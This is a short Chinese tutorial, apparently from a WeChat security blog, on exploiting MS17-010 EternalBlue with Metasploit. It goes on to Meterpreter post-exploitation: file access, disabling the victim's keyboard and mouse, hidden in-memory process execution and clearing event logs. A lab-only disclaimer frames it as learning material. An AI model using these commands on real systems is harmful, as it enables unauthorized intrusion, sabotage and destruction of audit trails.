本文我们简单的来学习,
msfconsole在实际的渗透测试中长应用的手段和方法。以及msf在后渗透阶段的使用。注意本文所讲到的技术仅在本地靶场环境运行,同时本文的主旨在于网络安全学习,请勿非法恶意攻击,造成后果自负。
漏洞扫描与利用
在利用msf时,我们通常是先利用其自有的模块进行漏洞扫描,这里我们以ms17_010为例 首先执行下面命令搜索相关漏洞。
search ms17_010
然后利用use进入指定模块
use exploit/windows/smb/ms17_010_eternalblue
用info命令查看模块相关信息
利用set命令设置载荷相关信息。如
set RHOSTS 192.168.123.35
然后点击run开始渗透。如果系统存在该漏洞。则成功进入目标系统。很简单吧!
后渗透阶段
所谓后渗透阶段,就是指,当我们成功得到了目标主机的会话,需要执行的操作。这里我们将常用的操作总结如下:
进入cmd
我们需要输入shell命令后,会进入系统的cmd命令输入框。如果出现中文乱码的情况,我们chcp 65001便可以解决中文乱码问题。输入exit可以退出cmd,重新进入msf框架。
查看主机是否在虚拟机运行
run post/windows/gather/checkvm
获取主机详细信息
run scraper
文件相关
pwd # 查看当前目录
cd # 切换目标目录
cat # 读取文件内容
rm # 删除文件
edit # 使用vim编辑文件
ls # 获取当前目录下的文件
mkdir # 新建目录
rmdir # 删除目录
download file # 从目标系统中下载文件
upload file # 向目标系统上传文件
禁止目标主机使用键盘鼠标
uictl disable(enable) keyboard # 禁止(允许)目标使用键盘
uictl disable(enable) mouse # 禁止(允许)目标使用鼠标
运行指定程序
execute -f 指定的可执行文件
-f:指定可执行文件
-H:创建一个隐藏进程
-a:传递给命令的参数
-i:跟进程进行交互
-m:从内存中执行
-t:使用当前伪造的线程令牌运行进程
-s:在给定会话中执行进程
清除事件日志
clearev
更多精彩文章 欢迎关注我们
原文始发于微信公众号(kali黑客笔记):msfconsole从入门到免费吃饭
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论